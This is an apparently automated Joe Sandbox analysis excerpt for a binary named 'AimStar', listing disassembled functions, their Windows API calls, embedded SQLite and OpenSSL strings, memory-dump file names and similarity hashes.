fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF8A876021A

Strings

winOpen, xrefs: 00007FF8A876048D
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A87602F6
exclusive, xrefs: 00007FF8A87601AB
psow, xrefs: 00007FF8A8760591

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction ID: a285a24079b0e43113201f6fc1a1dbd01497a31b593ea3aed3f1d0bd9430d8a3
Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction Fuzzy Hash: E202B221F4E746AAFB649B61E85877D67A0FF85BC5F044234DD4E126A0CF3CE8848728

Function 00007FF8A875D9F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A875DA33
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A875DA5C
ReadFile.KERNEL32 ref: 00007FF8A875DAAF

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A875DB48
winRead, xrefs: 00007FF8A875DB07

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 137774199-1843600136
Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction ID: 31ea4272e5eb6bae09548c77bcf8cfe6ae6421d0a2a4db0451dfe129ae5c9f93
Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction Fuzzy Hash: 31415332B0E64AAAE714CF25E8445AA7FA6FF947C4F445032EA4D43794DF3CE8428358

Function 00007FF710F55698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F556C5
CreateFileW.KERNEL32 ref: 00007FF710F55704
CloseHandle.KERNEL32 ref: 00007FF710F55739

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 57b0805b4dedd170d077c52c52f2dd55480e61956bb90982d794e7ba44127fe1
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: FC41A422D1CB8183E710AB20A525369B274FB98774F508334E65C43BD1DF6CB6E8C720

Function 00007FF8A92D14BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A932F1C3

Strings

state_machine, xrefs: 00007FF8A932F2AE, 00007FF8A932F450, 00007FF8A932F483
..\s\ssl\statem\statem.c, xrefs: 00007FF8A932F2B5, 00007FF8A932F45C, 00007FF8A932F48F

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction ID: c44d7131be85151bdfc8df9a0bdac41448c28bd669d202b706806a62f1f2b3d1
Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction Fuzzy Hash: A3A1A625A0EED3A5FB649E25D4413BD22F4EF61BC4F686031DA0DC66CACE7CE8418B51

Function 00007FF8A92D127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A9318AC5

Strings

ssl3_write_pending, xrefs: 00007FF8A9318B62, 00007FF8A9318BBE
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FF8A9318B6E, 00007FF8A9318BCA

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction ID: e45d10cc4133dc210498c93d6af8e9d869a76598930113be7c579be29106ca97
Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction Fuzzy Hash: D7419C61A0EEC1A2EB549F15D4403A9B3B0FB40BC4F24A135DA0D8BBA5EF7DE4518704

Function 00007FF710F4CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F4CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF710F4CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF710F4CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF710F4CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF710F4CD91

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: f86debf643235593b7be9c14e733410fa1d33e0e6414d0b660a82ef33f0312fe
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 8F314B24E0CD4A41FA94BB249413BB9A7A99F82364FC41435DD4E873D7DE2CB54DC2B0

Function 00007FF710F501AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F501F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F502E7

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 4415d54d0e9112cf570ce86f7bdd0eada1020eec1386451ce365590b03d77549
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: BA510721B0DE4286E624BA25940267AE6A9BF44BB4F944734FD6D077C5CF3CF609C620

Function 00007FF710F5C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF710F5C33D), ref: 00007FF710F5C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF710F5C33D), ref: 00007FF710F5C1FA

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: aef44f2f5366f79e8214a64a47ab3388f90d106056455035c87d1f75997280f3
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 7811016170CE8585DA10AB25A805169A765BB45BF4FA40331EE7E4B7E9CE3CE149C740

Function 00007FF710F5ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC36
GetLastError.KERNEL32(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC40

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 1048a9ef22b1386a641669696459e8910cb824b636df09723529b7f1934003eb
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 7421F621F1CF4202FB947761A49627DA6AA9F847B0F984235D91E473C1CE6CF55DC320

Function 00007FF710F5BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5BF44

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: aa72ee2592d382dd08425d545d729f8931765502da21ca7784fd98ff4e1ff4b3
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 7B41FA3290CA0587EA34EB55A442279F3B8EB55B64F900231D68E837D1CF2DF60ACB61

Function 00007FF710F47F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF710F4802A

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
Instruction ID: 1a419967110c828ae5f09544322849f4f73aa95bdf616ce36ed783d756fdebf9
Opcode Fuzzy Hash: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
Instruction Fuzzy Hash: DB21B421B1CE9145FA10BA1665067BAD659BF45BE4FCC4430EE0D47786DE3DF14EC620

Function 00007FF710F5B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5BA32

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: d256453a2c421d75ce99b316cd917a00d1563a8c4ac9bc046f766115c415cc2b
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: F4316D21A1CE4685E7517B5598432BCA6B8AF40BB4FC20135EA2D133D2DF7CB64ACB31

Function 00007FF710F56004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F55F69

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 112694b0c182173f9853aebfcad77bc136b04b966ce9d1756f840c6b9624079c
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: EE115022A1CA4142EA60BF51A41617DF2B8AF45FA4FC44031EB4C97B96DF3CF648C720

Function 00007FF710F663C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F663E7

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: c1dd9f59005675640eeff9b239c71591a89f5c2ba31457f648358fb3adfbc96f
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 3E21957661CE4186D761AF18D482379B6A4EB88B64F944234E69D477D5DF3CE408CB10

Function 00007FF8A8756940 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87569A0

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID:
API String ID: 2830847230-0
Opcode ID: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
Instruction ID: de6d157daaf1f00bccf3d7bf36af743d50ef40090b7935f7189f5db6607c22aa
Opcode Fuzzy Hash: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
Instruction Fuzzy Hash: 2411E331B4E68250FF9D9716A2446BD9351DF65FC4F082035EE4D0BB89EF2CE4824718

Function 00007FF710F5042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F50480

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 10718e271cad2a571baf90d70102e54687d9dab54d5bfaaffa5820a2cb728e7d
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: A401A121A0CF8141EA04EF529912069E6A9AF85FF0F884631EE5C57BD6CE3CF645C310

Function 00007FF710F49070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

LoadLibraryExW.KERNEL32(?,00007FF710F46466,?,00007FF710F4336E), ref: 00007FF710F49092

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction ID: 006f608e0c2231c8ac34c35ccd8d2803dc766936af4755f38da3caf0b9aa0ada
Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction Fuzzy Hash: 9AD08C11B2CA4541EA54B76BBA4762A9255AB89BD4E88C035EE0D03B5ADC3CE0868B00

Function 00007FF8A92DEF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FF8A92DEE5D), ref: 00007FF8A92DEF61

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
